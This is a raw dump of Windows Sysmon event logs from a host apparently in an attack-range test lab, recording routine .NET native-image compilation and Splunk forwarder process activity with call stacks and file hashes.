21:04:57.236{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1C04-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021168Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.205{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1C04-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021167Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.205{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1C04-00000000CF01}3992C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 10341000x800000000000000021166Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DEC-60D3-3800-00000000CF01}33643396C:\Windows\system32\conhost.exe{4DB9351A-A1F9-60D3-1B04-00000000CF01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021165Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021164Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021163Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021162Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-9DEA-60D3-2E00-00000000CF01}8C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021161Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1F9-60D3-1A04-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021160Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1B04-00000000CF01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021159Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-9DEA-60D3-3000-00000000CF01}24043520C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4DB9351A-A1F9-60D3-1B04-00000000CF01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000021158Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.080{4DB9351A-A1F9-60D3-1B04-00000000CF01}6584C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{4DB9351A-9DDB-60D3-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4DB9351A-9DEA-60D3-3000-00000000CF01}2404C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000021157Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.048{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1F9-60D3-1A04-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021156Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.048{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1F9-60D3-1A04-00000000CF01}6936C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 23542300x800000000000000021155Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.017{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=953BC35F7C12B66C87D7F909CD2199A7,SHA256=EB9AFDC833A88576C9C1EB869E16271C110A38283701B94E91E7B89D9DD9DE27,IMPHASH=00000000000000000000000000000000falsetrue 11241100x800000000000000021154Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:57.001{4DB9351A-A1F8-60D3-1904-00000000CF01}5100C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\13ec-0\Microsoft.Windows.VolumeActivation.Plugin.dll2021-06-23 21:04:57.001 10341000x800000000000000021215Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.973{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FA-60D3-2604-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021214Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.958{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FA-60D3-2604-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021213Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.958{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FA-60D3-2604-00000000CF01}6384C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+e032(wow64) 11241100x800000000000000021212Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.localDLL2021-06-23 21:04:58.926{4DB9351A-A1FA-60D3-2504-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\538-0\Microsoft.WSMan.Management.Activities.dll2021-06-23 21:04:58.926 354300x800000000000000021211Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:57.134{4DB9351A-9DF7-60D3-6D00-00000000CF01}3888C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-663.attackrange.local61433-false10.0.1.12-8000- 10341000x800000000000000021210Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.567{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FA-60D3-2504-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021209Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.551{4DB9351A-9DDB-60D3-0500-00000000CF01}412528C:\Windows\system32\csrss.exe{4DB9351A-A1FA-60D3-2504-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021208Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.551{4DB9351A-A039-60D3-1801-00000000CF01}53886420C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FA-60D3-2504-00000000CF01}1336C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783d0|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d19b(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d23f(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d2bd(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64) 23542300x800000000000000021207Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.536{4DB9351A-9DFF-60D3-7600-00000000CF01}3068NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8D847252E005C1A0F30A06735E7CD1B9,SHA256=BD019B954C7D1A41DAAF0E74E3C27AE4EBAF50D2A5327FE36114130DEF812A08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000021206Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.489{4DB9351A-9DDD-60D3-0C00-00000000CF01}844368C:\Windows\system32\svchost.exe{4DB9351A-A1FA-60D3-2404-00000000CF01}632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5126|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000021205Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.473{4DB9351A-9DDB-60D3-0500-00000000CF01}412496C:\Windows\system32\csrss.exe{4DB9351A-A1FA-60D3-2404-00000000CF01}632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000021204Microsoft-Windows-Sysmon/Operationalwin-dc-663.attackrange.local-2021-06-23 21:04:58.473{4DB9351A-A039-60D3-1801-00000000CF01}53885396C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{4DB9351A-A1FA-60D3-2404-00000000CF01}632C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e47|C:\Windows\SYSTEM32\ntdll.dll+78135|C:\Windows\SYSTEM32\ntdll.dll+77f9e|C:\Windows\SYSTEM32\ntdll.dll+6f66c(wow64)|C:\Windows\System32\KERNELBASE.dll+d9148(wow64)|C:\Windows\System32\KERNELBASE.dll+d7e2c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+52c7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+3805(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c9ed(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cbbe(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d0cd(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+cf32(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d41e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+d6be(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+de85(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+df91(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscors